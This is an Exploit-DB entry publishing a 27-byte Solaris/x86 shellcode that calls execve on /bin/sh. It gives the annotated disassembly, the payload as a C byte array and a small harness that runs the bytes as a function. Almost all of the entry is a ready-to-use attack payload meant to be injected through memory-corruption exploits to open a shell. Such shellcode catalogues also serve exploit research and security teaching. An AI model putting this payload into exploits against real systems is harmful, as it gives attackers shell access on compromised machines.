Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) Shellcode (27 bytes)

EDB-ID:

13704

Size:

27 bytes

EDB Verified:

Author:

Jonathan Salwan

Type:

shellcode

Shellcode: /

Platform:

Solaris_x86

Published:

2010-05-20

/*
Title: 	 Solaris/x86 - execve("/bin/sh","/bin/sh",NULL) - 27 bytes
Author:  Jonathan Salwan <submit AT shell-storm.org>
Web:	 http://www.shell-storm.org
Twitter: http://twitter.com/jonathansalwan

Date:	 2010-05-19
Tested:  SunOS opensolaris 5.11 snv_111b i86pc i386 i86pc Solaris

section .text
    0x8048074:              31 c0              xorl   %eax,%eax
    0x8048076:              50                 pushl  %eax
    0x8048077:              68 6e 2f 73 68     pushl  $0x68732f6e
    0x804807c:              68 2f 2f 62 69     pushl  $0x69622f2f
    0x8048081:              89 e3              movl   %esp,%ebx
    0x8048083:              50                 pushl  %eax
    0x8048084:              53                 pushl  %ebx
    0x8048085:              89 e2              movl   %esp,%edx
    0x8048087:              50                 pushl  %eax
    0x8048088:              52                 pushl  %edx
    0x8048089:              53                 pushl  %ebx
    0x804808a:              b0 3b              movb   $0x3b,%al
    0x804808c:              50                 pushl  %eax
    0x804808d:              cd 91              int    $0x91

*/


#include <stdio.h>

char sc[] = "\x31\xc0\x50\x68\x6e\x2f"
	    "\x73\x68\x68\x2f\x2f\x62"
	    "\x69\x89\xe3\x50\x53\x89"
	    "\xe2\x50\x52\x53\xb0\x3b"
	    "\x50\xcd\x91";

int main(void)
{
       	fprintf(stdout,"Length: %d\n",strlen(sc));
	(*(void(*)()) sc)();

return 0;
}

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services